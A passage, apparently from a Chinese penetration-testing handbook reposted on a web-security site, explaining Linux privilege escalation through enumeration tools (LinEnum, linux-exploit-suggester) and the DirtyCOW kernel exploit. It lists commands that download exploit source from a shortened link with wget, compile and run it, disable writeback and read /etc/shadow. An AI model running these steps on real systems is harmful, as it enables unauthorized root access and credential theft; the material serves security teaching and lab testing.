4.12 权限提升
Linux 权限提升的方法绝大部分类似于 Windows。我们查找存在漏洞的服务,例如可以写入文件、错误配置粘滞位、文件中的明文密码、全局可写文件、定时任务,当然还有补丁问题。
为了有效和高效地分析 Linux 设备权限提升的问题,可以使用一些工具完成所有的工作。
在进行任何类型的权限提升漏洞挖掘之前,首先了解 Linux 主机和系统的所有信息,包括用户、服务、定时任务、软件版本、弱凭证、错误配置的文件权限,甚至是 Docker 信息。我们可以使用一个名为 LinEnum 的工具完成所有琐碎的工作,如图 4.47 所示。
图 4.47
这是一份非常详细的分析报告,涉及您想要了解的所有关于底层系统的信息,对于后面的行动非常有帮助。
在获得系统的信息后,我们会尝试利用这些漏洞。如果在服务和定时任务中找不到任何粘滞位漏洞或错误配置漏洞,那么我们会查找系统/应用程序的漏洞。我尝试发现漏洞,最终总是有可能突破的设备。
我们可以运行一个名为 inux-exploit-suggester 的工具,分析主机系统,识别未打的补丁和存在的漏洞。一旦发现漏洞,该工具还将提供 PoC 漏洞利用工具的链接,如图 4.48 所示。
图 4.48
现在,我们还要寻找什么漏洞?这时实践经验就真正发挥作用了。在我的“实验室”中,我配置大量不同的 Linux 版本,验证这些漏洞是否会导致底层系统崩溃。在这个场景中,我最愿意研究的漏洞之一是 DirtyCOW。
DirtyCOW 漏洞的描述:Linux 内核的内存子系统在处理写入只读私有映射地址时,出现了资源竞争。非特权本地用户利用这个漏洞,获取对其他只读内存映射的写访问权,从而实现了权限提升。
简而言之,此漏洞允许攻击者通过内核漏洞,从非特权用户提升到 root 用户。这是我们想要实现的权限提升方式!但问题是,这种方式容易引起内核崩溃,因此必须确保在正确的 Linux 内核上使用正确的工具版本。
在 Ubuntu 中测试 DirtyCOW(ubuntu 14.04.1 LTS 3.13.0-32-generic x86_64)。
- 下载 DirtyCOW 静荷。
- wget http://bit.ly/2vdh2Ub -O dirtycow-mem.c
- 编译 DirtyCOW 静荷。
- gcc -Wall -o dirtycow-mem dirtycow-mem.c -ldl -lpthread
- 运行 DirtyCOW 获取系统权限。
- ./dirtycow-mem
- 关闭定期回写机制,确保漏洞稳定性。
- echo 0 >/proc/sys/vm/dirty_writeback_centisecs
- 尝试读取 shadow 文件。
- cat /etc/shadow
如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。
绑定邮箱获取回复消息
由于您还没有绑定你的真实邮箱,如果其他用户或者作者回复了您的评论,将不能在第一时间通知您!
发布评论